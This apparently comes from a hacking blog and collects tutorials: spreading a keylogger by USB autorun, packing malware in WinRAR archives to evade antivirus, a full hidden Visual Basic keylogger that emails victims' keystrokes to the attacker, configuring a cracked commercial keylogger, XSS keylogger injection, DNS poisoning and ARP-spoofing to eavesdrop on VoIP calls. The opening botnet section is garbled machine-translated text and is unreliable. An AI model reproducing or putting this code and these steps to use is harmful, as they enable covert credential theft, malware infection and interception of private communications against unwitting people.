What is Botnet ?



Botnet is a network of private computers infected with malicious software and controlled as a group without the owners' knowledge, e.g., to send spam messages....

The onset of the attack techniques in today's technology, one of the most important botnet attacks that .. In general, considering the, is a type of malicious software is hard-coded .. The backbone of DDoS attacks....Determined to attack on an address code is a set of integrated .. But it is more dangerous than a normal ddos attack.

If the features of the sort used briefly threatening situations;

* Thanks to Web addresses via pop-up allows you to advertise an address can also, in general, is a        method used by companies in order to promote ..
* Virus, Logger, and so on. may contain malicious software, computer users, their passwords, 2    information disclosure allows parties to be shared ..
* Infect computer networks, data from all the computers on the network share it, so that it becomes    overrun Information Security ..
* Spam providing for the use of the e-mails out of the circulation of annoying advertising allows  mails ..
Lined up against the user can cause this and similar methods.. In todaSyC'RsO tLeL cMhE nBoAlCoKg TyO, T HaEn T OoPr.dinary internet users; botnet network installation has become inevitable, namely MP3s downloaded from on the internet,
wallpaper, screensaver, videos, software programs, etc.. before you start on a small scale by a simple code that hackers can then be integrated as a result of the spread of this data allows for botnet which has become a huge mass.

One of the uses of botnet Mirc scripts, this is a huge botnet on chat systems, and where there is a huge virtual world without being aware of net users started to play the role of hooked fish ..
Hang bait, you're aware of the botnet ddos attack on any channel is found set by the owner, advertising messages on the servers will result in the desired
server, the port is added to the desired number of boats to attack .. In addition
to these without being aware of the internet browser, Login ID, except that
consent has changed their set, and the right to make changes in the Options
section of your hand is already taken ..
When you restart the computer, boot your system back up and running again,
and will continue to see the activity on the server ..
Engelleyemeyeceğinizi's worth noting that this type of attack 100%, but this
kind of attack must be taken to protect you, to take steps in this regard can
make a few;
* Continuous updating the computer, the operating system's latest version
şekillendirmelisiniz ..
* If your system updates itself, and the use of frequent difficulty of not going
down, filter, use an antivirus program high ..

 

Spoof mac on macosx


This tutorial is for mac users only. As i will explain how to spoof your mac address on MacOsx.
Mac spoofing is useful! Ok lets start.

1: Open terminal and type. 

                       Code
-----------------------------------------
ifconfig en1 | grep ether
-----------------------------------------

2: This will show you your current mac address.

3: Spoofing your mac address.for spoofing your mac address type. (you can type any mac adress but  64 bit adress)
 
                        Code
-------------------------------------------------
sudo ifconfig en1 ether 00:e2:e3:e4:e5:e6
-------------------------------------------------

4: Verify you''s adress by useing 1step command write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.



NOTE:

Write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.

 

Spread your Keylogger&Rat using USB (Auto-run)



1: Creating autorun.inf Open notepad and copy the following code to it.

                                        Code
---------------------------------------------------------------
[autorun]
open=autorun.bat
icon=anything.ico
----------------------------------------------------------------

2: Save file as autorun.inf is the file we want to execute when our CD/USB is inserted. Anything.ico    is the name of icon file we want to set to our CD/USB drive.

3:Creating autorun.bat Open notepad and copy the following code to it.If it is saved in a folder named Cyberwarriors488 which is present in the root directory of CD/USB . Then
the code should be like this

                                         Code
---------------------------------------------------------------
@echo off
start Cyberwarriors488/keylogger.exe
----------------------------------------------------------------

4: Save it as autorun.bat and place it in the root directory of the CD/USB

Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your
keylogger.




 

FUD Malware Using Winrar


It  works with everyfile, such as Darkcomet, .Net Files,Executables and every other Files...............

1:So first Download WinRAR
2:Then install it. Now it should be ready for use.
3:You have your Server.exe
4:Now select you Server and add to a Winrar Archive


5:Make sure you check "self-extracting" "solid-Archive" and "Protect Archive for changes" then go to    "advanced"



6:Add at "Directory to extract" "%temp%" <or add the Path where itshould extract the Files>Then at  "Execute after Extracting" add "Server.exe" <or the Name ofyour Virus, Trojan, etc.>Now navigate to  "Mode"


7:Check "hide all" <"I would recommend this because it will completely invisible at the Victims Machine">
8:Go to "Update"


9:Check "overwrite all Files". Now just click OK.
10:Goto "Select Password"


11:Use what ever Password you want, but remember this we will need it later.Click OK. and generate the
 File in my case "Server.sfx.exe"Now you just need to understand we used a password and WinrarEncrypts  the File for us. So it gets Undetectable. 
12:Open up Notepad and write the name of you encrypted Archive "-p(here the password) -d(here the  directory you used before to extractthe Files.)"

                                                       Code

---------------------------------------------------------------------------
Server.sfx.exe -pabc123 -d%temp%
----------------------------------------------------------------------------

13:And Save it anyname something.BAT otherwise the whole process wont work.

14:Now you have both Files The last Step is Open up again Winrar and add these both "something.bat" and
 "Server.sfx-exe"Files in an Archive.


15:Goto SFX-Options




16:Click OK.







 

100% FUD Email sending keylogger in Visual Basic.

          How to make a email sending keylogger in Visual Basic. 100% Fud



You want to steal someone's password but you don't want to spend even a single penny to buy those costly Remote keyloggers present on the net and that's the case with me too.So why not we design our own keylogger.

(A remote keylogger is a piece of software that logs every key pressed on the keyboard and sends it to the hacker sitting on other side.It can be his email,Irc or ICQ address where the key pressed by the victim goes.)

Today let's start with some programing.If you are already a programmer than this article is just for you.I'm going to provide you the source code for visual basic and with tutorial on how to implement it in your project.

1:Open Visual basic and Make a new project named MyKeylogger or anything else you want.

2:Now we need to add all the required items in our Visual basic Form.
Add:Textbox for capturing text.,
3timers :-Timer1 controls how often it will look for keystrokes.

Timer 2 controls how often it will try to mail results
Timer 3 controls how long the forum will be visible (1 millisecond by default)

3: Change the properties of the timer intervals so they can perform accurately.(intervals are in millisecond)
For:
Timer1, 10 (timer1 interval is set to 10 so that it does not record the same keystrokes twice,from being held down to long by the user,but still it suitable for fast typing.)
Timer2, 1500000
Timer3, 1

4: Now lets change the properties of Textbox1,
and Forum1

For Textbox1 we need to change the following
1. Set Read only to True
2. Set Multi line to True
3. Set MaxLength to 2147483647 (Max Value)

For Forum1 we need to change the following:
1. Set Opacity to 0%
2. Set show in taskbar to False

5:Now we need to add the code to our form1 as it is of no use without it.So I'm not going in further details for why and where you should add the code,just follow the below mentioned steps.5.1:Double click on the form1.
5.2:You will see some sorts of coding already present there.Erase it all.
5.3:Now you just have to paste under mentioned code in your form1 code window.

                                                          Code's                                
-------------------------------------------------------------------
Imports System.Net.Mail 'Mail Class

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "USER32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Timer1.Start()
Timer2.Start()
Timer3.Start()

End Sub
Public Function GetCapslock() As Boolean
' Return Or Set the Capslock toggle.

GetCapslock = CBool(GetKeyState(&H14) And 1)

End Function

Public Function GetShift() As Boolean

' Return Or Set the Capslock toggle.

GetShift = CBool(GetAsyncKeyState(&H10))

End Function
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i As Integer = 1 To 225
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
If GetCapslock() = True And GetShift() = True Then
Select Case (i)
Case 192
TextBox1.Text = TextBox1.Text + "~"
Case 1
'TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48
TextBox1.Text = TextBox1.Text + ")"
Case 49
TextBox1.Text = TextBox1.Text + "!"
Case 50
TextBox1.Text = TextBox1.Text + "@"
Case 51
TextBox1.Text = TextBox1.Text + "#"
Case 52
TextBox1.Text = TextBox1.Text + "$"
Case 53
TextBox1.Text = TextBox1.Text + "%"
Case 54
TextBox1.Text = TextBox1.Text + "^"
Case 55
TextBox1.Text = TextBox1.Text + "&"
Case 56
TextBox1.Text = TextBox1.Text + "*"
Case 57
TextBox1.Text = TextBox1.Text + "("
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + ">"
Case 16
Case 160 To 165
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 189
TextBox1.Text = TextBox1.Text + "_"
Case 187
TextBox1.Text = TextBox1.Text + "+"
Case 219
TextBox1.Text = TextBox1.Text + "{"
Case 221
TextBox1.Text = TextBox1.Text + "}"
Case 186
TextBox1.Text = TextBox1.Text + ":"
Case 222
TextBox1.Text = TextBox1.Text + """"
Case 188
TextBox1.Text = TextBox1.Text + "<"
Case 191
TextBox1.Text = TextBox1.Text + "?"
Case 220
TextBox1.Text = TextBox1.Text + "|"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 20
Case 91 'windows key
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = True And GetShift() = False Then
Select Case (i)
Case 91 'windows key
Case 1
'TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i)
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i)
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48 To 57
TextBox1.Text = TextBox1.Text + Chr(i)
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + "."
Case 16
Case 160 To 165
Case 20
Case 192
TextBox1.Text = TextBox1.Text + "`"
Case 189
TextBox1.Text = TextBox1.Text + "-"
Case 187
TextBox1.Text = TextBox1.Text + "="

Case 219
TextBox1.Text = TextBox1.Text + "["
Case 221
TextBox1.Text = TextBox1.Text + "]"
Case 186
TextBox1.Text = TextBox1.Text + ";"
Case 222
TextBox1.Text = TextBox1.Text + "'"
Case 188
TextBox1.Text = TextBox1.Text + ","
Case 191
TextBox1.Text = TextBox1.Text + "/"
Case 220
TextBox1.Text = TextBox1.Text + "\"
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = False And GetShift() = True Then
Select Case (i)
Case 91 'windows key
Case 192
TextBox1.Text = TextBox1.Text + "~"
Case 1
' TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i)
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i)
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48
TextBox1.Text = TextBox1.Text + ")"
Case 49
TextBox1.Text = TextBox1.Text + "!"
Case 50
TextBox1.Text = TextBox1.Text + "@"
Case 51
TextBox1.Text = TextBox1.Text + "#"
Case 52
TextBox1.Text = TextBox1.Text + "$"
Case 53
TextBox1.Text = TextBox1.Text + "%"
Case 54
TextBox1.Text = TextBox1.Text + "^"
Case 55
TextBox1.Text = TextBox1.Text + "&"
Case 56
TextBox1.Text = TextBox1.Text + "*"
Case 57
TextBox1.Text = TextBox1.Text + "("
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + ">"
Case 16
Case 160 To 165
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 189
TextBox1.Text = TextBox1.Text + "_"
Case 187
TextBox1.Text = TextBox1.Text + "+"
Case 219
TextBox1.Text = TextBox1.Text + "{"
Case 221
TextBox1.Text = TextBox1.Text + "}"
Case 186
TextBox1.Text = TextBox1.Text + ":"
Case 222
TextBox1.Text = TextBox1.Text + """"
Case 188
TextBox1.Text = TextBox1.Text + "<"
Case 191
TextBox1.Text = TextBox1.Text + "?"
Case 220
TextBox1.Text = TextBox1.Text + "|"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 20
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = False And GetShift() = False Then
Select Case (i)
Case 1
' TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48 To 57
TextBox1.Text = TextBox1.Text + Chr(i)
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + "."
Case 16
Case 160 To 165
Case 20
Case 192
TextBox1.Text = TextBox1.Text + "`"
Case 189
TextBox1.Text = TextBox1.Text + "-"
Case 187
TextBox1.Text = TextBox1.Text + "="
Case 91 'windows key
Case 219
TextBox1.Text = TextBox1.Text + "["
Case 221
TextBox1.Text = TextBox1.Text + "]"
Case 186
TextBox1.Text = TextBox1.Text + ";"
Case 222
TextBox1.Text = TextBox1.Text + "'"
Case 188
TextBox1.Text = TextBox1.Text + ","
Case 191
TextBox1.Text = TextBox1.Text + "/"
Case 220
TextBox1.Text = TextBox1.Text + "\"
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40

Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If

End If
Next i
End Sub

Sub MainEvents()
'Fill In all Required info, if your not using gmail use smtp . your email provider ex:
'"smpt.yahoo.com" or "smpt.custom_email.edu"
Try
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("cyberwarriors488.blogspot.com@gmail.com")
MyMailMessage.To.Add("cyberwarriors488.blogspot.com@gmail.com")
MyMailMessage.Subject = "Test"
MyMailMessage.Body = TextBox1.Text
Dim SMPT As New SmtpClient("smtp.gmail.com")
SMPT.Port = 587
SMPT.EnableSsl = True
SMPT.Credentials = New System.Net.NetworkCredential("cyberwarriors488.blogspot.com@gmail.com", "Your_Email_Password")
SMPT.Send(MyMailMessage)
TextBox1.Text = ""
Catch ex As Exception
End Try
End Sub

Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick

If TextBox1.Text <> "" Then
MainEvents()
End If
End Sub

Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
Me.Visible = False
Me.Hide()
End Sub

End Class
--------------------------------------------------------------------------



 

RDP Brute Force Tool



xTSCrack is a tool to assist the peneration tester find weak passwords over RDP protocol (3389). It is basically a RDP brute force tool.

Features:

Test for weak password automatically;
Test for weak/user passwords;
Wordlist option;
Userlist option;
Configurable port;
Range IP Address audit and more.












 

Adrmax Keylogger Step by Step Tutorial



what is keylogger ?

Keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. These keyloggers allow not only keyboard keystrokes to be captured but also are often capable of collecting screen captures from the computer. The keys they press are programmed to automatically transmit data over the network to a remote computer or Web server.

1:After installing the program,past the crack file in installation directory


2:After Cracking , open it up. When you’ll open it, you’ll see an icon added into your system tray shown in pic below.







3:Now lets right click on that icon & then click on “Pre-config Installer”. Now  you should have something   as shown in pic below



4:Lets click on next and make sure that u should have the picture as below. 


5:Now next screen would give you “Invisibility” options. This will help you to hide your key logger   from your victim’s computer. 


6:Now next screen says “Security”, just click on NEXT.

7:Now the page that says “Web Update”, lets UNCHECK all off the boxes & click on NEXT.

8: Now you will see “Options” page. 


9:Now here comes the most important page, which will show u the options and will let u select     the way you want to receive the information from your victim’s computer.and click on Next!

10:Select Email and enter you email id & passwd and click on test and you check you email you receive a test mail and click on Ok




11:Send installer file your victim .





































 

XSS Keylogger



XSS Keyloggers is  a simple way to grab informations a user type on a web page.Keylogging is the action of recording the keys struck on a keyboard.A keylogger can be used to spy on someone, grab their passwords, read their conversations or steal their personal informations.

1:Download xss keylogger.

2:Upload these files on any webhosting site.

3:Now open keylogger.js with any text editor & find the line "localhost" & replace it  with you website where you will be hosting your xss keylogger files.

4:injected script into the search field of any xss vulnerable site.To inject script on site use this script
----------------------------------------------------------
<script> src=your's javascript.jr uploaded link</script>
----------------------------------------------------------

5: Now after injecting the script. Let's check weather its working or not !. Just type anything in the search field. Now get back to your xss.php & check the logs. Any entered text on the webpage where we injected the script will be recorded & shown in our logs text file.




 xsskeylogger

 

DNS-Poison attack






The job of a DNS is to convert the human readable addresses entered  into machine readable IP addresses.

For example when you type the URL (http://www.google.com) into the address bar the first thing that occurs is the nearest DNS server is contacted and the IP address of google domain is retrieved. Based on this IP address the website is opened.
So a DNS is a huge database that stores IP addresses of different domains. These are cached and updated on a regular basis.

DNS poisoning is also called DNS cache poisoning, and refers to the corruption of DNS tables and caches so that a domain name points to a malicious IP address. Once the user is re-directed to the malicious IP address his/her computer can be infected with worms, viruses, spy ware etc. Cache poisoning is mostly done through spam emails, or through web-links and banners that attracts users to click on them. A simple click causes the user to be re-directed to a DNS poisoned server.

How to create DNS-poison attack:



1: If your target DNS server is running Microsoft’s DNS server, on W2K SP 1 or 2, you can poison DNS using an alias. You have to have control of a zone (yourname.com) and a DNS server. You create a zone on your dns server under the name you want to poison (example.com). Your DNS server thinks it is authoritative for the example.com zone.

2: Next you create a host record in example.com that points to a host you control. In your real zone (yourname.com), you create a CNAME record for a host like spoof that points to hostname at example.com, like www.example.com. Then you point your local stub resolver at the target DNS server (most DNS servers will resolve for anyone by default). When you try to lookup spoof.yourname.com, the target DNS server will find your dns server. Your dns server will see that spoof.yourname.com is a CNAME for www.example.com and look that up. Since it thinks it is authoritative for example.com, it will ask itself, and return that IP address to the target DNS server. Now it is in the targets DNS cache. Anyone who tried to resolve www.example.com from that DNS server will get the IP address of the host you defined in the example.com zone.

3: Another way is to sniff the traffic of the target DNS server and when it tries to resolve a host name, feed it the result of your choosing before the recursive query finishes. The first response wins.



How to recover from a DNS-Poison attack:


1: You need to be absolutely positive that you have not been infected with spyware. Many spyware/adware programs today will modify the DNS settings or local hosts file on Windows machines. So you should run your personal spyware/adware detection tool.

2: Try to find out the IP address of the malicious DNS server(s) (check site to see if it has been reported)

3: You may want to block the IP address of the malicious DNS server at your border routers/firewalls so that your so that you cache does not become poisoned again.

4: Cleaning up from a site-wide DNS cache poisoning may require flushing the cache on all of your DNS servers in your organization probably starting with the most externally facing DNS boxes first.

5: On Windows DNS servers, you can stop/start the DNS service to clear the cache. You can also use the dnscmd.exe command from the
6: resource kit:

7. dnscmd.exe /ClearCache

8: On Windows 2000, XP, and 2003 clients, you can flush the client cache by running "ipconfig /flushdns". (Please note that this will do nothing to clean-up a poisoned DNS caching server upstream.)

9: On BIND 9, you can clear the cache by running "rndc" command and executing the "flush" command. On     BIND 8 or below, it appears that you have to restart the server.




 

Sniff VoIP Calls


Hello friends Cyberwarriors are back with Amazing Tutorial Sniffing VoIP Calls With Wireshark.......

VoIP phones are implemented in every major organization and they are providing an attack surface for every malicious user that’s knows the basics of hacking. If there is no encryption in the communication media then an attacker could eavesdrop phone conversations which might impact the business in case that calls are classified as confidential.

A pentester should be able to identify if eavesdropping is possible on the voice network via the following technique.

ARP Poisoning:


The first step before implementing a Man-in-the-Middle attack is to enable IP forwarding in order to be able to route traffic from your system to the gateway with the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now you can perform a Man-in-the-Middle attack in order to be able to intercept VoIP traffic. This can be achieved really easy with the command below:




Capturing and Decoding VoIP Traffic


Now that the traffic is being routed to your box you can use Wireshark in order to sniff any SIP traffic. We are particularly interested for the RTP packets as they contain the actual conversation of a VoIP call.



Wireshark contains a built-in utility called VoIP calls which can decode RTP data into a playable audio format.




Secure your Network form this Attack:

As we saw it is very easy and fast to eavesdrop a phone call conversation just by performing a MiTM attack and having a tool like wireshark to sniff the traffic. In a VoIP assessments pentesters should try to implement this attack in order to identify if eavesdropping is possible. To prevent this attack companies should use the SRTP which is a secure protocol and provides encryption of the data being transferred so even if an attacker is able to capture the call it will be difficult to decrypt the data and to listen the message or we add voip pohens in different voip vlans................

 






 

Email Spoofer by CyberWarriors



Email is the most comprehensive surveillance system ever created.

It’s easy for us to think that we are safe behind our web browsers and that nobody is watching what we do. The reality is that your online activities are constantly logged, tracked, and indexed by big business and government agencies. To keep your emails away from prying eyes, use an anonymous email address.


So, here we are, use our free  anonymous PhP Emailer

This Emailer sent mail in inbox folder 100%

Step 1:Upload life on free hosting 

Step 2:Fill the information and click on send ..!!!

Passwd=cyberwarriors













 

What is 'write-protection'?


'Write protection' is a type of security measure which places a 'lock' on digital files. The locking action prevents modifications from being made to the stored data, and is a simple way to avoid changes being made to important files without your permission. So far, so logical; but occasionally these security measures can backfire, essentially locking you out of your own home.
Write-protection is often a physical (rather than a virtual) security measure; lifting it usually involves flicking a switch on the mass storage device. The trick is to first find the switch, and or to change the virtual settings on your computer to accept the physical changes.


Insert the memory stick into the computer
Step 1:Go to My Computer and under Devices with Removable Storage look for your card reader
Step 2:Right-click on it and click Properties In the pop-up box, sometimes there's an option to Remove write-protection. Change the status of this option and try again.

Still not working??

Remove your memory stick from the drive
Step 1:Click Start > Run... In the box type regedit and press OK
Step 2:A new window will appear. Goto:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies
Step 3:If you can't locate StorageDevicePolicies then you will need to create this folder
Step 4:Right-click on Control and click on New > Key. Name this StorageDevicePolicies
Step 5:Right-click on the new folder you created called StorageDevicePolicies and click New >DWORD Value.
Step 6:Name this WriteProtect
Step 7:Double-click on Write Protect and change the Value Data to 0 and then click OK
Step 8:Close the Registry Editor and insert the memory stick into your computer



 

Installing TOR browser



What is Tor?

Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. This guide guides your through installing tor in Kali Linux.

Installing Tor in Kali Linux:

Step1: Downloading and Running Tor bundle
After Downloading the architecture-appropriate file above, save it anywhere, then run one of the following two commands to extract the package archive

Step 2:TO extract the Package use this command in terminal
----------------------------------------------------------------------
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
----------------------------------------------------------------------

If you useing 64-bit version use this Command

----------------------------------------------------------------------
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
-----------------------------------------------------------------------

Step 3:Once that’s done, switch to the Tor browser directory by running

Step 4:To run the Tor Browser Bundle, execute the start-tor-browser script:

-----------------------------------------------------------------------
./start-tor-browser
-----------------------------------------------------------------------









 

NMAP EBook



Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Nmap is ...

Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities

About EBook:

Introduction....................................................................................... 15
Section 1: Installing Nmap .................................................................. 19
Section 2: Basic Scanning Techniques .................................................. 33
Section 3: Discovery Options .............................................................. 45
Section 4: Advanced Scanning Options ................................................ 65
Section 5: Port Scanning Options ........................................................ 79
Section 6: Operating System and Service Detection ............................. 89
Section 7: Timing Options .................................................................. 97
Section 8: Evading Firewalls .............................................................. 115
Section 9: Output Options ................................................................ 127
Section 10: Troubleshooting and Debugging ...................................... 135
Section 11: Zenmap .......................................................................... 147
Section 12: Nmap Scripting Engine (NSE)........................................... 161
Section 13: Ndiff .............................................................................. 171
Section 14: Tips and Tricks ................................................................ 177
Appendix A - Nmap Cheat Sheet ....................................................... 187
Appendix B - Nmap Port States ......................................................... 191
Appendix C - CIDR Cross Reference ................................................... 193
Appendix D - Common TCP/IP Ports .................................................. 195
6
7
Table of Contents
Introduction....................................................................................... 15
Conventions Used In This Book ............................................................. 18
Section 1: Installing Nmap .................................................................. 19
Installation Overview ............................................................................ 20
Installing Nmap on Windows ................................................................ 21
Installing Nmap on Unix and Linux systems .......................................... 25
Installing Precompiled Packages for Linux ........................................ 25
Compiling Nmap from Source for Unix and Linux ............................ 26
Installing Nmap on Mac OS X ................................................................ 29
Section 2: Basic Scanning Techniques .................................................. 33
Basic Scanning Overview ....................................................................... 34
Scan a Single Target............................................................................... 35
Scan Multiple Targets ............................................................................ 36
Scan a Range of IP Addresses ................................................................ 37
Scan an Entire Subnet ........................................................................... 38
Scan a List of Targets ............................................................................. 39
Scan Random Targets ............................................................................ 40
Exclude Targets from a Scan.................................................................. 41
Exclude Targets Using a List .................................................................. 42
Perform an Aggressive Scan .................................................................. 43
Scan an IPv6 Target ............................................................................... 44
Section 3: Discovery Options .............................................................. 45
Discovery Options Overview ................................................................. 46
Don’t Ping ............................................................................................. 47
Ping Only Scan ....................................................................................... 48
TCP SYN Ping ......................................................................................... 49
TCP ACK Ping ......................................................................................... 50
UDP Ping ............................................................................................... 51
SCTP INIT Ping ....................................................................................... 52
8
ICMP Echo Ping ..................................................................................... 53
ICMP Timestamp Ping .......................................................................... 54
ICMP Address Mask Ping ...................................................................... 55
IP Protocol Ping .................................................................................... 56
ARP Ping ............................................................................................... 57
Traceroute ............................................................................................ 58
Force Reverse DNS Resolution.............................................................. 59
Disable Reverse DNS Resolution ........................................................... 60
Alternative DNS Lookup Method.......................................................... 61
Manually Specify DNS Server(s) ........................................................... 62
Create a Host List .................................................................................. 63
Section 4: Advanced Scanning Options ................................................ 65
Advanced Scanning Functions Overview .............................................. 66
TCP SYN Scan ........................................................................................ 67
TCP Connect Scan ................................................................................. 68
UDP Scan .............................................................................................. 69
TCP NULL Scan ...................................................................................... 70
TCP FIN Scan ......................................................................................... 71
Xmas Scan ............................................................................................. 72
Custom TCP Scan .................................................................................. 73
TCP ACK Scan ........................................................................................ 74
IP Protocol Scan .................................................................................... 75
Send Raw Ethernet Packets .................................................................. 76
Send IP Packets ..................................................................................... 77
Section 5: Port Scanning Options ........................................................ 79
Port Scanning Options Overview .......................................................... 80
Perform a Fast Scan .............................................................................. 81
Scan Specific Ports ................................................................................ 82
Scan Ports by Name .............................................................................. 83
Scan Ports by Protocol .......................................................................... 84
9
Scan All Ports......................................................................................... 85
Scan Top Ports ....................................................................................... 86
Perform a Sequential Port Scan ............................................................ 87
Section 6: Operating System and Service Detection ............................. 89
Version Detection Overview ................................................................. 90
Operating System Detection ................................................................. 91
Submitting TCP/IP Fingerprints ............................................................. 92
Attempt to Guess an Unknown Operating System ............................... 93
Service Version Detection ..................................................................... 94
Troubleshooting Version Scans ............................................................. 95
Perform an RPC Scan ............................................................................. 96
Section 7: Timing Options .................................................................. 97
Timing Options Overview ..................................................................... 98
Timing Parameters ................................................................................ 99
Timing Templates ................................................................................ 100
Minimum Number of Parallel Operations........................................... 101
Maximum Number of Parallel Operations .......................................... 102
